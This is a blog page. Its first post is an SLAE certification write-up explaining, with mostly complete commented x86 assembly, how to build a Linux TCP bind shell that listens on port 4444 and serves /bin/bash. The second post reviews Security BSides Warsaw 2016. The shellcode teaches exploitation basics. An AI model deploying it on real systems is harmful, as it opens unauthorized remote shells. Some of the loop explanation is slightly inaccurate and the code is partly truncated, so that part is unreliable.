czwartek, 27 października 2016

SLAE 0x1 Simple TCP bind shell for Linux

In the begining: all the code mentioned in this post is available at: my github account


I wanted somehow to start my adventure with exploiting. First I went to where you can find many fantastic tutorials. However they were too difficult to me to be fully understood. And then I found securitytube with its "Securitytube Linux Assembly Expert" (SLAE). Although after learning all the materials available I feel rather a beginner than an expert, the course in quite coherent way introduces assembler and shellcoding.

The best motivation is to put some money in a challenge, therefore I have bought SLAE certification, and to get certified I have to complete some coding tasks. Each task requires me to put its solution on Github and to write a blog post describing my solution. The first task is to write a bind shell.



The shellcode is just a simple program that creates a socket, puts it in listening state and then runs a shell that a connecting client can interact with. The 'pseudocode' is a simple overview of the program containing the logical blocks. I did not write a C program in the begining, however after all I regret that decision and further tasks will be solved with first writing a C code

create socket;
prepare structure for binding;
bind socket to a port;
put socket in listening state;
accept incoming connections on socket;
redirect std(in/out/err) to socket;
Example C code can be found e.g. on, although my code is a bit less complicated.

Creating socket

  ; creating SOCKET
  xor eax,eax
  xor ebx,ebx
  xor ecx,ecx
  push eax     ; push 0 on stack, stack now contains value 0
  mov al, 102  ; ax contains call number of socket
  mov bl, 1
  push ebx     ; push 1 on stack, stack now contains 0 and 1 (SOCK_STREAM)
  mov cl,2
  push ecx     ; push 2 on stack, stack now contains 0, 1 and 2 (AF_INET)

  mov ecx, esp ; save the pointer to arguments in ecx
               ; arguments are on stack in reverse order bottom-top (0, 1, 2)
               ; and poping them will recover the correct order (2, 1, 0)  
  int 0x80     ; call socket() syscall

  mov esi, eax ; store socket_file_descriptor in the esi register

socket() is a syscall and each syscall contains its own number in the operating system. Such a number can be found in /usr/include/i386-linux-gnu/asm/unistd_32.h. Simple cat + grep shows that socket's number is 102.
For this and the next syscalls you may encounter, if you want to read some details, try running manual, e.g. man socket, or if that will show some irrelevant results, try the next 'page', man 2 accept.
But how to call socket? Let's check in manual (man socket):
int socket(int domain, int type, int protocol);
Domain is the protocol type used. In the same manual page you can see, that for the IPv4 it is AF_INET.
Type defines "communication semantics" what simply means that it is higher layer protocol. As we are interested in TCP, SOCK_STREAM would be our choice.
Protocol is generally not used because there is mostly theoretical possibility that there may be more than one protocol within domain. For normal use, 0 is the correct value.
The returned value is a socket file descriptor (in unix everything is a 'file').
Therefore our call is as follows:
sock_file_descriptor = socket(AF_INET, SOCK_STREAM, 0)
The constants used may be found in /usr/include/i386-linux-gnu/bits/socket.h and their respective values are: 2 and 1. So our call to socket() should be: sockfd = socket(2, 1, 0);

Going back to the code, there are three xors. These instructions puts 0 in the particular registry without having the "0" value in the resulting code, what is very important, as the resulting code cannot have any NULL bytes.
Later, the 0 value is pushed onto the stack. Just after that, eax value is set to 102 (the syscall number of socket()) what will be needed further. After setting eax, ebx and ecx are set to 1 and 2 and pushed onto stack. Stack then contains

Stack pointer is saved in the ecx registry and the syscall is being executed through the int call. The call would then run syscall with number in eax with arguments in ebx and ecx. The ebx is interesting because it contains value "1" which is re-used both in pushing to stack and in calling socket - SYS_SOCKET in file /usr/include/linux/net.h is defined with value 1. Ecx contains the address to the stack and poping off the stack all the arguments will put them in correct order: 2, 1 and 0.

The result of calling int 0x80 is the socket file descriptor and is is being put in eax registry. As that registry will be used heavily, that value is saved in the esi registry.

Bind socket

; opening SOCKET on port 4444
  xor ecx,ecx    ; ecx zeroing to ease the port number manipulating
  xor edx,edx    ; edx zeroing to be able to push 0 onto the stack
  push edx       ; INADDR_ANY
  mov cx, 4444
  xchg ch,cl     ; because htons(port) reverses bytes
  push ecx
  xor ax,ax
  mov al, 2      ; AF_INET
  push ax        ; ax, not eax because this is part of the structure and 
                 ; is 16-bits long                            
                 ; stack now has (INADDR_ANY, port_no,protocol_family)

  mov ecx, esp   ; save the pointer to the args in ecx registry

Bind() call requires a special structure of data as argument, read man 2 bind. The value of INADDR_ANY taken from /usr/include/netinet/in.h is 0 - we want to accept any connection from client. We are going to push it onto stack and then the port number. Therefore we push first 0. Then the 16-bit port number is being put in the cx registry. Since the structure requires the port to be the result of htons(port), in the next instruction the xchg is being called to swap bytes. After all, ecx is being pushed onto stack.
the protocol (AF_INET) family number is being pushed so the stack looks as follows:


Resulting stack pointer is being copied to the ecx registry for further use.
Having the data prepared, it is time to call the bind() syscall:

; calling bind() syscall
  ; in the file /usr/include/linux/net.h
  ; bind call has the value 2
  ; therefore we should use that value to point the operation   
  ; that we do with a socket

  mov al, 102  ; ax contains call number of socket syscall
  mov bl, 2    ; socket call type number, 2 = bind
  mov dl,16    ; size of sock_address structure
  push edx
  xor edx,edx  ; zeroing again
  push ecx     ; pointer to the structure, created 6 instructions above
  push esi     ; push socket_file_descriptor on stack
  mov ecx, esp ; save the pointer to args in ecx registry
  int 0x80     ; call socket call type bind with particular port

Again, all the registries need to be initiated with proper values:
eax - 102, the number of socket() syscall
ebx - 2, the number of bind() call in /usr/include/linux/net.h
edx - 16, the size of the structure generated before
Then comes the 'magic': edx, ecx and esi are pushed onto stack. The stack pointer is copied to ecx because ecx should contain pointer to arguments of bind() call. And these arguments are the file descriptor, the connection structure and the size of connection structure. The last thing is obvious - having initiated everything we are calling the syscall for bind().

Putting socket in listening state

  mov al, 102  ; ax contains call number of socket syscall
  mov bl, 4    ; socket call type number, 4 = listen
  push edx     ; backlog (==0)
  push esi     ; push socket_file_descriptor on stack
  mov ecx, esp ; save the pointer to args in ecx registry
  int 0x80

This part is fortunately very short :-) Again we are initiating eax with the socket() syscall number but now we are calling listen(), represented by the number 4 in `/usr/include/linux/net.h`. Listen() call requires two parameters: the socket file descriptor and something called "backlog", which can be set to 0 and forgotten. Those two values are pushed onto the stack and set in ecx as the pointer to arguments. Finally the syscall is being executed

Accepting connections

  mov al, 102  ; ax contains call number of socket syscall
  mov bl, 5    ; socket call type number, 5 = accept
  push edx     ; addrlen
  push edx     ; addr
  push esi     ; push socket_file_descriptor on stack
  mov ecx, esp ; save the pointer to args in ecx registry
  int 0x80

We are almost done with socket manipulating. The last call is for accept(), which has number 5 in /usr/include/linux/net.h. Accept() call requires three parameters described in man 2 accept`:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
Since second and third parameters are not used, they may be 0 and the call simplifies itself. 

Redirect all the basic streams to socket

Having the socket handler open and ready, you need to remember to redirect all the I/O streams to it to allow the shell to be fully interactive. Dup2 is the syscall that does the stream duplication.

  ; saving client connection file descriptor
  mov ebx, eax ; save the incoming connection's file descriptor
  xor ecx, ecx ; zeroing ecx before the loop
  mov cl, 3    ; counter for the loop


  mov al, 63  ; syscall for dup2()
  int 0x80
  dec cl      ; decrementing the loop counter
  jns stdloop ; loop until the sign flag is not set
              ; it cannot be jnz because we really want                               
              ; to execute loop on 0 counter

First we need to save the result of accept() call, we do that in ebx registry. Then we set ecx to 3 which is the loop counter as we want to run the loop three times.
In loop we first set the dup2 syscall number in eax and then we call the syscall. After all we decrement the loopcounter and test if we hadn't reached -1. If so, we do not the loop again and we go to executing the shell.
First call of dup2() will have parameters ebx,ecx and in c it would look like dup2(clientfd, 3), so now file descriptor number 3 is clientfd
Second call of dup2() would look like dup2(clientfd, 2), so clientfd now replaced stderr
Second call of dup2() would look like dup2(clientfd, 1), so clientfd now replaced stdout
Second call of dup2() would look like dup2(clientfd, 0), so clientfd now replaced stdin

So - clientfd is saved in descriptor 3 and everything will be redirected to the socket represented by clientfd.

Execute shell

  ; all std's have been redirected
  ; finally - run SHELL
  mov   al, 11           ; The syscall number of execve
  push  edx              ; push null - the string-terminating character
  push  0x68736162       ; hsab
  push  0x2f6e6962       ; /nib
  push  0x2f2f2f2f       ; ////
  mov   ebx,esp          ; Store pointer to executable's name in registry
  push  edx              ; push null - the envp must be null
  push  ebx              ; push pointer to the executable path - the 
                         ; first argument of execve 
  mov   ecx,esp          ; save pointer to the argv (pointer to string 
                         ; with executable + null)  
  int   0x80             ; run 
                         ; execve("////bin/bash", argv, NULL) 
                         ; the last NULL is in edx

The first thing in this block of code, just after initialising eax with a proper syscall number, is to put some strange fixed values onto the stack. In the code these values are commented with strings, which read backwards would result in NULL, 'bash', 'bin/' and '////. Putting all the vaules together gives us written backwards path to the executable: '////bin/bash'
Why backwards? Because we need them on the stack and this is the simplest way.
You can put any executable name here and getting that 'strange' numbers (representing ASCII values of the string characters) is possible with the following script. To ease such a task, I have created a simple python tool
What is important, is that the length of the executable should be a multitude of 4. Therefore, if you have a string of e.g. 9 bytes length, you must somehow extend it to 12 or 16 etc. bytes.
Taking "/bin/bash" as example, you may add additional '/' characters resulting in "////bin/bash" which is 12 bytes long string. To have the proper hex values just run `python "////bin/bash"`

Wow - that was a bit long explanation but you now should understand where from those 'magic values' came out.
After pushing the string onto a stack, we store the pointer to the string in ebx.
Then we must store in registries the final arguments of execve call:
edx - envp - NULL, we do not want to pass anything to bash
ecx - argv - pointer to the structure containing address of the executable and NULL.
ebx - executable - pointer to the executable's name

And finally the syscall :-)

Basic usage

OK, so cool assembly, but what next?
I have created some scripts to ease the process of compiling and testing the shellcode. They are described in on Github, however the one 'fire and forget' is Running it with assembly file as argument will compile and link assembler code plus create and compile a simple c program to test the shellcode (some kind of integration test). In case of this bind_shell.nasm, the syntax would be: ./ bind_shell

I hope that if you managed to get here, you understand the shellcode logic and now you can create your own bind shell for Linux.

Mandatory footer to get certified:

Student ID: SLAE-769

poniedziałek, 24 października 2016

Security BSides Warsaw 2016

About a year ago I had a honour to be a speaker at the Security BSides 2015 and you can watch it here. Shomehow I didn't share my experience, but as the event is annual, I would like to describe what happend this year.

The event

It is 3-day lasting free IT Security conference in Warsaw, the capital of Poland. Event is organised by people from the IRC channel #listekklonu on pirc network. Leading person is piatkosia. Most of the presentations are in polish, however there were some english ones and organisers are very open to have more speakers from abroad.

Tickets and crowdfunding

As I mentioned, the event is free, but that does not mean that everything is costless. Organisers started crowdfunding campaing on site. The threshold was 5600 zł and they managed to get 6000 zł. The capacity of the conference room was limited and there were some tickets available. They were splitted to three parts: the small part was available on the crowdfunding, and the rest was divided to two halves of 75 seats. One was completely free and the other was about 12 zł each. The paid tickets were cheap and knowing how hard it is to organise an event, I have bought one.

The place

Event was located in Państwo Miasto at Andersa 29. On the ground floor there is a small restaurant with moderately expensive food an drinks, however very tasty. On the first floor there are some non-goverment organisations and medium-size conference room. The room has two disadvantages. Most notable is lack of air - with about 150 people it is very hard to not yawn or even faint on hot days. Between presentations there is a mandatory break for refreshing the air. Pro tip: Sit at the very back, so you would get air from back window and the doors. The other disadvantage is the visibility of the white screen (on which the image of the presentation is displayed). It is very low and the ceiling construction would cover it if it would be higher. Pro tip: while sitting at back, sit against the column without seats - therefore you would see much more than sitting behind people. Nevertheless, the higher standard of conference room would cost serious money and may influence the atmosphere of hacker's meeting.


I was a bit late and my named badge was waiting for me and few promotional materials (newspaper, paper notebook etc.). Upstairs there was a presentation ongoing, organisers were where they should be, speakers got their free lunch and there was an after party. What would you expect more? Well, you might expect that every speakers would be on time. This is nothing wrong with the organisers but some speakers cancelled their presentations in the last minute. There were therefore numerous changes in the agenda and only due to hard work of piatkosia and the rest of the team (prezes, xaxes, nikow and others that I don't know).

Most interesting presentations

Well, It is very hard to point the best among so many well candidates. Therefore I would like to single out four most interesting to me. Many more were at least good and were presented by well-recognised people. Even more - these presentations will be presented at way more recognised events as Secure, Confidence etc.

Mateusz Szymaniec, Jarosław Jedynak - "Jak zdobyć flagę" ("How to capture the flag?"
Speakers are the founders of the CTF team p4 They spoke about CTF - what it is, what are the kinds of tasks and what was needed to capture the flag in some example challenges. Quite a good introduction made by one of the top teams. What is worth mentioning, they told how CTF influenced their professional career.

Miłosz Kaniewski - TLS 1.3: Co nowego? ("What's new in TLS 1.3")
This presentation was exactly what it should be: what is wrong in TLS 1.2 and what is being proposed in TLS 1.3 to address the known issues of current implementations (e.g. no CBC mode of AES, no 3DES etc.)

Mateusz Kocielski - "Make DragonflyBSD great again?"
Mateusz also known as shm or akat1 told about how he noticed an error in DragonflyBSD and how he exploited it. Pretty awesome skills and in effect: root. It was a very well-spoken and coherent story. There was a little surprise when the prepared example didn't work but Mateusz momentarily understood the problem and resolved it explaining why it didn't work at the first time.

Adam Haertle - Wlamania do bankow z łomem i bez ("Bank robbing with and without the crowbar")
Adam told the audience about bank robberies which took place in the last decacade or so. It was a fascinating story about the physical (in)security. What is worth remembering: the bank trays are very secure and even having two days of full access, robbers are able to break into about 10% of them.
Later he told about latest e-bank robberies with keyboard used instead of the crowbar. Among them the most notably is the theft of $80 mln from Bangladesh central bank.

After party

What happens at BSides stays at BSides :) That's all what I would say. Great people, great beer and [top secret] :)


It was a great event and I really do have a great hope that in 2017 it will take place again. It will be almost impossible to have such quality progress as it was between 2015 and 2016 editions so, organisers, especially patkosia: I challenge you :-)
I definitely will be present in 2017 since I consider this event as one of the most interesting IT Security events in Poland. Well done :-)

Someone may be asking, why I am writing in english about the conference in polish. This blog is in english and there may be no speakers from abroad if there will be no articles about Security BSides Warsaw in english. How else would you know about such an event abroad?